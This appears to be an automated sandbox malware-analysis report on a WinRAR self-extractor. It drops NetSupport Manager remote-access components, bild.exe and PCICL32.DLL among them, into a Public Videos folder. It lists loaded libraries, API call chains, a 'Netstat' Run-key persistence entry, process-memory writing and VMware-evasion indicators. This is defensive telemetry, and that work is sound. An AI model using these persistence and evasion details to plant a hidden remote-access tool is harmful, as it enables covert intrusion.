                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: pcicl32.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: shfolder.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: pcichek.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: pcicapi.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: netapi32.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: samcli.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: wtsapi32.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: nsmtrace.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: nslsp.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: devobj.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: pcicl32.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: shfolder.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: pcichek.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: pcicapi.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: netapi32.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: samcli.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: wtsapi32.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: nsmtrace.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: nslsp.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: devobj.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                                Source: C:\Users\user\Desktop\file.exeFile written: C:\Users\Public\Public\Videos\Video\client32.iniJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeFile opened: C:\Windows\SysWOW64\riched32.dllJump to behavior
                                Source: Window RecorderWindow detected: More than 3 window changes detected
                                Source: file.exeStatic file information: File size 2138286 > 1048576
                                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\Public\Public\Videos\Video\msvcr100.dllJump to behavior
                                Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                                Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                                Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                                Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                                Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                                Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: file.exe
                                Source: Binary string: msvcr100.i386.pdb source: file.exe, 00000000.00000003.1727368341.00000000035A5000.00000004.00000020.00020000.00000000.sdmp, bild.exe, bild.exe, 00000004.00000002.3582942113.000000006C971000.00000020.00000001.01000000.0000000C.sdmp, bild.exe, 00000005.00000002.1835584954.000000006C971000.00000020.00000001.01000000.0000000C.sdmp, bild.exe, 00000009.00000002.1916341976.000000006C971000.00000020.00000001.01000000.0000000C.sdmp, msvcr100.dll.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdb source: bild.exe, 00000004.00000002.3583091798.000000006D0F2000.00000002.00000001.01000000.0000000D.sdmp, bild.exe, 00000005.00000002.1835772057.000000006D0F2000.00000002.00000001.01000000.0000000D.sdmp, bild.exe, 00000009.00000002.1916559157.000000006D0F2000.00000002.00000001.01000000.0000000D.sdmp, PCICHEK.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: file.exe, 00000000.00000003.1727368341.00000000035A5000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000005.00000002.1835014337.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.1915886362.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdbN source: PCICHEK.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: bild.exe, 00000004.00000002.3582830563.000000006C7C0000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\client32\Release\client32.pdb source: bild.exe, 00000004.00000000.1735527672.0000000000822000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 00000004.00000002.3580738922.0000000000822000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 00000005.00000000.1832877239.0000000000822000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 00000005.00000002.1834377646.0000000000822000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 00000009.00000000.1914004958.0000000000822000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 00000009.00000002.1914967107.0000000000822000.00000002.00000001.01000000.00000009.sdmp, bild.exe.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdb source: TCCTL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: bild.exe, 00000004.00000002.3582830563.000000006C7C0000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: bild.exe, 00000004.00000002.3583184483.000000006D105000.00000002.00000001.01000000.0000000B.sdmp, bild.exe, 00000005.00000002.1835885776.000000006D105000.00000002.00000001.01000000.0000000B.sdmp, bild.exe, 00000009.00000002.1916704363.000000006D105000.00000002.00000001.01000000.0000000B.sdmp, pcicapi.dll.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdbP source: TCCTL32.DLL.0.dr
                                Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_11029590 GetTickCount,LoadLibraryA,GetProcAddress,SetLastError,_malloc,GetProcAddress,GetLastError,_free,_malloc,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary,4_2_11029590
                                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\Public\Public\Videos\Video\__tmp_rar_sfx_access_check_6205828Jump to behavior
                                Source: PCICL32.DLL.0.drStatic PE information: section name: .hhshare
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041D8B6 push ecx; ret 0_2_0041D8C9
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041CDF0 push eax; ret 0_2_0041CE0E
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_1116F055 push ecx; ret 4_2_1116F068
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_11169F49 push ecx; ret 4_2_11169F5C
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_1116F055 push ecx; ret 5_2_1116F068
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_11169F49 push ecx; ret 5_2_11169F5C
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_11040E01 push 3BFFFFFEh; ret 5_2_11040E06
                                Source: msvcr100.dll.0.drStatic PE information: section name: .text entropy: 6.909044922675825
                                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\Public\Public\Videos\Video\bild.exeJump to dropped file
                                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\Public\Public\Videos\Video\PCICL32.DLLJump to dropped file
                                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\Public\Public\Videos\Video\remcmdstub.exeJump to dropped file
                                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\Public\Public\Videos\Video\pcicapi.dllJump to dropped file
                                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\Public\Public\Videos\Video\HTCTL32.DLLJump to dropped file
                                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\Public\Public\Videos\Video\msvcr100.dllJump to dropped file
                                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\Public\Public\Videos\Video\PCICHEK.DLLJump to dropped file
                                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\Public\Public\Videos\Video\TCCTL32.DLLJump to dropped file
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_11127E10 GetMessageA,Sleep,OpenSCManagerA,DispatchMessageA,OpenServiceA,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,4_2_11127E10
                                Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NetstatJump to behavior
                                Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NetstatJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_11139090 GetCurrentThreadId,IsWindowVisible,IsWindow,IsWindowVisible,IsWindowVisible,GetForegroundWindow,EnableWindow,EnableWindow,EnableWindow,SetForegroundWindow,FindWindowA,IsWindowVisible,IsWindowVisible,IsIconic,GetForegroundWindow,SetForegroundWindow,EnableWindow,GetLastError,GetLastError,GetLastError,GetTickCount,GetTickCount,FreeLibrary,4_2_11139090
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_1115B1D0 _memset,SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows,4_2_1115B1D0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_11113290 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt,4_2_11113290
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_110CB2B0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,4_2_110CB2B0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_110CB2B0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,4_2_110CB2B0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_110254A0 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer,4_2_110254A0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_110258F0 IsIconic,BringWindowToTop,GetCurrentThreadId,4_2_110258F0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_11023BA0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer,4_2_11023BA0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_11024280 _memset,_strncpy,_memset,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId,4_2_11024280
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_11112670 IsIconic,GetTickCount,4_2_11112670
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_111229D0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,4_2_111229D0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_111229D0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,4_2_111229D0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_110C0BB0 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId,4_2_110C0BB0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_1115B1D0 _memset,SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows,5_2_1115B1D0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_11139090 GetCurrentThreadId,IsWindowVisible,IsWindow,IsWindowVisible,IsWindowVisible,GetForegroundWindow,EnableWindow,EnableWindow,EnableWindow,SetForegroundWindow,FindWindowA,IsWindowVisible,IsWindowVisible,IsIconic,GetForegroundWindow,SetForegroundWindow,EnableWindow,GetLastError,GetLastError,GetLastError,GetTickCount,GetTickCount,FreeLibrary,5_2_11139090
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_11113290 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt,5_2_11113290
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_110CB2B0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,5_2_110CB2B0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_110CB2B0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,5_2_110CB2B0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_110254A0 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer,5_2_110254A0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_110258F0 IsIconic,BringWindowToTop,GetCurrentThreadId,5_2_110258F0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_11023BA0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer,5_2_11023BA0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_11024280 _memset,_strncpy,_memset,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId,5_2_11024280
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_11112670 IsIconic,GetTickCount,5_2_11112670
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_111229D0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,5_2_111229D0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_111229D0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,5_2_111229D0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_110C0BB0 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId,5_2_110C0BB0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_1115ADD0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,5_2_1115ADD0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_1115ADD0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,5_2_1115ADD0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_11143570 GetTickCount,GetModuleFileNameA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,4_2_11143570
                                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                                Malware Analysis System Evasion

                                barindex
                                Delayed program exit found
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_110B8200 Sleep,ExitProcess,4_2_110B8200
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_110B8200 Sleep,ExitProcess,5_2_110B8200
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeWindow / User API: threadDelayed 939Jump to behavior
                                Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\Public\Public\Videos\Video\remcmdstub.exeJump to dropped file
                                Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\Public\Public\Videos\Video\HTCTL32.DLLJump to dropped file
                                Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\Public\Public\Videos\Video\TCCTL32.DLLJump to dropped file
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeEvaded block: after key decisiongraph_4-58898
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeEvaded block: after key decisiongraph_4-62976
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeEvaded block: after key decisiongraph_4-62937
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeEvaded block: after key decision
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeEvaded block: after key decision
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeEvaded block: after key decision
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeEvaded block: after key decision
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeEvaded block: after key decision
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_4-63069
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_4-62869
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeAPI coverage: 6.3 %
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeAPI coverage: 2.6 %
                                Source: C:\Users\Public\Public\Videos\Video\bild.exe TID: 7760Thread sleep time: -93900s >= -30000sJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeLast function: Thread delayed
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040A273 FindFirstFileW,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0040A273
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041A537 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0041A537
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,4_2_1102D330
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_11065890 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,4_2_11065890
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_1106A0A0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,4_2_1106A0A0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_111266E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,4_2_111266E0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,5_2_1102D330
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_11065890 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,5_2_11065890
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_1106A0A0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,5_2_1106A0A0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_111266E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,5_2_111266E0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_1110AFD0 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,5_2_1110AFD0
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041C8D5 VirtualQuery,GetSystemInfo,0_2_0041C8D5
                                Source: HTCTL32.DLL.0.drBinary or memory string: VMware
                                Source: file.exe, 00000000.00000002.1734404708.00000000011B9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                Source: bild.exe, 00000004.00000002.3582830563.000000006C7C0000.00000002.00000001.01000000.0000000E.sdmpBinary or memory string: plist<T> too longp.secondQueueQueueThreadEventidata->Q.size () == 0p < ep%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlWinHttpCloseHandleWinHttpGetProxyForUrlNS247WinHttpOpenWinHttpGetIEProxyConfigForCurrentUserwinhttp.dllc != '\0'dstbufyenc.cla|l*
                                Source: HTCTL32.DLL.0.drBinary or memory string: hbuf->datahttputil.c%5d000000000002004C4F4F50VirtualVMwareVIRTNETGetAdaptersInfoiphlpapi.dllcbMacAddress == MAX_ADAPTER_ADDRESS_LENGTHmacaddr.cpp,%02x%02x%02x%02x%02x%02x* Netbiosnetapi32.dll01234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZwhoa nelly, says Sherman, the Sharkhellooo nurse!kernel32.dllProcessIdToSessionId%s_L%d_%xNOT copied to diskcopied to %sAssert failed - Unhandled Exception (GPF) -
